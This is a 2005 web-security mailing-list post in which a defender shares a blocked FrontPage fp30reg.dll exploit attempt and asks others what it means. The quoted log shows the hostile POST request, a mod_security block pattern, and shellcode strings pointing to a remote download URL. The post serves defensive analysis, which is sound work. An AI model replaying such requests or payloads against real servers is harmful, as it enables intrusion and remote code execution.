[WEB SECURITY] Frontpage Exploit - Strange POST Payload

Ryan Barnett rcbarnett at gmail.com
Tue Jun 21 10:20:11 EDT 2005


I received a Frontpage exploit
(http://www.osvdb.org/displayvuln.php?osvdb_id=2952&Lookup=Lookup)
attempt yesterday.  I get these types of probes all the time (as I am
sure most of you do as well).  I normally filter these requests as I
am not using Frontpage.  The reason that I took a look at this
particular request log is that it triggered a Shellcode sig in Snort.

Since there was some binary data in the request, I piped it through
strings.  Here is the log entry -

========================================
Request: 66.161.76.150 - - [20/Jun/2005:23:31:11 --0400] "POST
/_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Host: 199.196.145.215
Transfer-Encoding: chunked
Content-Length: 1499
mod_security-message: Access denied with code 403. Pattern match
"/fp30reg\.dll" at THE_REQUEST
mod_security-action: 403
1499
Ehttp://10.10.2.2:191/lsd
080/lsd
,0F4
%**f

HTTP/1.1 403 Forbidden
========================================

What was interesting was the POST payload of the request, specifically
the URL -
http://10.10.2.2:191/lsd.  Has anyone else seen this before?  Three
questions that I have when looking at this -

1) This appears to be an attempt to have my vulnerable server download
something from a remote website.  If this is so, why the use of the
non-routable IP address (10.10.X.X)?  My server wouldn't be able to
get to the attacker's site...

2) What about the use of port 191?  This port seems to be related to
the propero service (by Cliff Neuman).  Does anyone know of any
trojans that use this port?

3) I am assuming that "/lsd" URI is a file for some form of malware.

Let me know if you have any insight into this exploit attempt.

Thanks.

-- 
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor: Securing Apache
GCIA, GCFA, GCIH, GSNA, GCUX, GSEC

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list